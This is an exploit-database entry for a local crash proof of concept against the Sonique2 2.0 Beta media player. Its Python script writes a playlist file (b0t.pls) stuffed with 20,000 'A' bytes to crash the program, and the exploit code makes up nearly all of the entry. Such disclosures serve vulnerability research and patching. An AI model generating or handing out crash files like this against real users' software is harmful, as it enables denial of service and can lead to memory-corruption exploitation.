Sonique2 v2.0 Beta Build 103 Local Crash PoC



EDB-ID: 11234 CVE: N/A OSVDB-ID: N/A
Author: b0telh0 Published: 2010-01-23 Verified: Verified
Exploit Code:   Download Vulnerable App:    Download

Rating

(0.0)
Screenshot
Prev Home Next
#!/usr/bin/python
#
# Title: Sonique2 2.0 Beta Build 103 Local Crash PoC
# Found by: b0telh0
# Tested on: Windows XP SP3


crash = "\x41" * 20000

try:
     file = open('b0t.pls','w');
     file.write(crash);
     file.close();
     print "[+] Created b0t.pls file."
except:
     print "[-] Error cant write file to system."






Comments

No comments so far